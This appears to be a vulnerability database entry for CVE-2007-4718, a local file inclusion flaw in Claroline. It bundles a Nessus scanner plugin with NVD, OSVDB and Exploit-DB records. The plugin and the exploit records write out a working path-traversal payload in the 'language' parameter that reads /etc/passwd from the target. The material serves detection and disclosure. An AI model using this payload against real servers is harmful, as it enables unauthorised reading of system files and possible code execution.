Claroline inc/lib/language.lib.php language Parameter Traversal Local File Inclusion
2007-09-10T00:00:00
ID CLAROLINE_LANGUAGE_INCLUDE.NASL Type nessus Reporter This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2007-09-10T00:00:00
Description
The version of Claroline installed on the remote host fails to
sanitize user-supplied input to the 'language' parameter before using
it to include PHP code in the 'load_translation' method in
'claroline/inc/lib/language.lib.php'. Regardless of PHP's
'register_globals' setting, an unauthenticated, remote attacker may be
able to exploit this issue to view arbitrary files or to execute
arbitrary PHP code on the remote host, subject to the privileges of
the web server user id.
In addition, the version is likely to be affected by several cross-
site scripting issues involving administrative scripts, although
Nessus did not check for them.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(26011);
script_version("1.20");
script_cve_id("CVE-2007-4718");
script_bugtraq_id(25521);
script_name(english:"Claroline inc/lib/language.lib.php language Parameter Traversal Local File Inclusion");
script_summary(english:"Tries to read a local file with Claroline");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is susceptible to a
local file include attack." );
script_set_attribute(attribute:"description", value:
"The version of Claroline installed on the remote host fails to
sanitize user-supplied input to the 'language' parameter before using
it to include PHP code in the 'load_translation' method in
'claroline/inc/lib/language.lib.php'. Regardless of PHP's
'register_globals' setting, an unauthenticated, remote attacker may be
able to exploit this issue to view arbitrary files or to execute
arbitrary PHP code on the remote host, subject to the privileges of
the web server user id.
In addition, the version is likely to be affected by several cross-
site scripting issues involving administrative scripts, although
Nessus did not check for them." );
# http://web.archive.org/web/20071026171600/http://www.claroline.net/forum/viewtopic.php?t=13533
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c19b346c" );
script_set_attribute(attribute:"see_also", value:"https://secuniaresearch.flexerasoftware.com/advisories/26685" );
script_set_attribute(attribute:"solution", value:
"Upgrade to Claroline 1.8.6 or later." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_cwe_id(22);
script_set_attribute(attribute:"plugin_publication_date", value: "2007/09/10");
script_set_attribute(attribute:"vuln_publication_date", value: "2007/07/31");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:claroline:claroline");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("claroline_detect.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
script_require_keys("www/claroline");
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
# Test an install.
install = get_kb_item(string("www/", port, "/claroline"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
dir = matches[2];
# Try to retrieve a local file.
file = "../../../../../../../../../../../../etc/passwd%00";
r = http_send_recv3(method: "GET", port: port,
item:string(
dir, "/?",
"language=", file
));
if (isnull(r)) exit(0);
res = r[2];
# There's a problem if there's an entry for root.
if (egrep(pattern:"root:.*:0:[01]:", string:res))
{
contents = res - strstr(res, "<br />");
report = string(
"Here are the repeated contents of the file '/etc/passwd' that\n",
"Nessus was able to read from the remote host :\n",
"\n",
contents
);
security_warning(port:port, extra:report);
set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
exit(0);
}
}
{"id": "CLAROLINE_LANGUAGE_INCLUDE.NASL", "bulletinFamily": "scanner", "title": "Claroline inc/lib/language.lib.php language Parameter Traversal Local File Inclusion", "description": "The version of Claroline installed on the remote host fails to\nsanitize user-supplied input to the 'language' parameter before using\nit to include PHP code in the 'load_translation' method in\n'claroline/inc/lib/language.lib.php'. Regardless of PHP's\n'register_globals' setting, an unauthenticated, remote attacker may be\nable to exploit this issue to view arbitrary files or to execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user id. \n\nIn addition, the version is likely to be affected by several cross-\nsite scripting issues involving administrative scripts, although\nNessus did not check for them.", "published": "2007-09-10T00:00:00", "modified": "2007-09-10T00:00:00", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/26011", "reporter": "This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?c19b346c", "https://secuniaresearch.flexerasoftware.com/advisories/26685"], "cvelist": ["CVE-2007-4718"], "type": "nessus", "lastseen": "2021-01-20T09:38:14", "edition": 28, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4718"]}, {"type": "osvdb", "idList": ["OSVDB:38987"]}, {"type": "exploitdb", "idList": ["EDB-ID:30556"]}], "modified": "2021-01-20T09:38:14", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-01-20T09:38:14", "rev": 2}, "vulnersScore": 7.0}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26011);\n script_version(\"1.20\");\n\n script_cve_id(\"CVE-2007-4718\");\n script_bugtraq_id(25521);\n\n script_name(english:\"Claroline inc/lib/language.lib.php language Parameter Traversal Local File Inclusion\");\n script_summary(english:\"Tries to read a local file with Claroline\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is susceptible to a\nlocal file include attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of Claroline installed on the remote host fails to\nsanitize user-supplied input to the 'language' parameter before using\nit to include PHP code in the 'load_translation' method in\n'claroline/inc/lib/language.lib.php'. Regardless of PHP's\n'register_globals' setting, an unauthenticated, remote attacker may be\nable to exploit this issue to view arbitrary files or to execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user id. \n\nIn addition, the version is likely to be affected by several cross-\nsite scripting issues involving administrative scripts, although\nNessus did not check for them.\" );\n # http://web.archive.org/web/20071026171600/http://www.claroline.net/forum/viewtopic.php?t=13533\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c19b346c\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://secuniaresearch.flexerasoftware.com/advisories/26685\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Claroline 1.8.6 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(22);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/09/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/07/31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:claroline:claroline\");\nscript_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"claroline_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/claroline\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/claroline\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches))\n{\n dir = matches[2];\n\n # Try to retrieve a local file.\n file = \"../../../../../../../../../../../../etc/passwd%00\";\n r = http_send_recv3(method: \"GET\", port: port,\n item:string(\n dir, \"/?\",\n \"language=\", file\n ));\n if (isnull(r)) exit(0);\n res = r[2];\n # There's a problem if there's an entry for root.\n if (egrep(pattern:\"root:.*:0:[01]:\", string:res))\n {\n contents = res - strstr(res, \"<br />\");\n report = string(\n \"Here are the repeated contents of the file '/etc/passwd' that\\n\",\n \"Nessus was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n security_warning(port:port, extra:report);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n exit(0);\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "26011", "cpe": ["cpe:/a:claroline:claroline"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:26:08", "description": "Directory traversal vulnerability in inc/lib/language.lib.php in Claroline before 1.8.6 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter.", "edition": 5, "cvss3": {}, "published": "2007-09-05T19:17:00", "title": "CVE-2007-4718", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4718"], "modified": "2011-03-08T02:59:00", "cpe": ["cpe:/a:claroline:claroline:1.8.5"], "id": "CVE-2007-4718", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4718", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:claroline:claroline:1.8.5:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-4718"], "description": "## Manual Testing Notes\nhttp://[target]/inc/lib/languages.lib.php?language=../../[file]\n## References:\nVendor Specific News/Changelog Entry: http://www.claroline.net/forum/viewtopic.php?t=13533\nVendor Specific News/Changelog Entry: http://www.claroline.net/wiki/index.php/Changelog_1.8.x#Security\n[Secunia Advisory ID:26685](https://secuniaresearch.flexerasoftware.com/advisories/26685/)\nFrSIRT Advisory: ADV-2007-3045\n[CVE-2007-4718](https://vulners.com/cve/CVE-2007-4718)\nBugtraq ID: 25521\n", "edition": 1, "modified": "2007-07-31T00:00:00", "published": "2007-07-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:38987", "id": "OSVDB:38987", "title": "Claroline inc/lib/language.lib.php language Variable Traversal Local File Inclusion", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T12:36:25", "description": "Claroline 1.x inc/lib/language.lib.php language Parameter Traversal Local File Inclusion. CVE-2007-4718. Webapps exploit for php platform", "published": "2007-09-03T00:00:00", "type": "exploitdb", "title": "Claroline 1.x inc/lib/language.lib.php language Parameter Traversal Local File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4718"], "modified": "2007-09-03T00:00:00", "id": "EDB-ID:30556", "href": "https://www.exploit-db.com/exploits/30556/", "sourceData": "source: http://www.securityfocus.com/bid/25521/info\r\n\r\nClaroline is prone to a local file-include vulnerability and multiple cross-site scripting vulnerabilities.\r\n\r\nAn attacker could exploit these issues to execute local script code in the context of the application and access sensitive data, which may aid in further attacks.The attacker may also be able to execute arbitray code in the context of the webserver. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.\r\n\r\nVersions prior to Claroline 1.8.6 are vulnerable. \r\n\r\nhttp://www.example.com/inc/lib/languages.lib.php?language=../../[file]", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/30556/"}]}
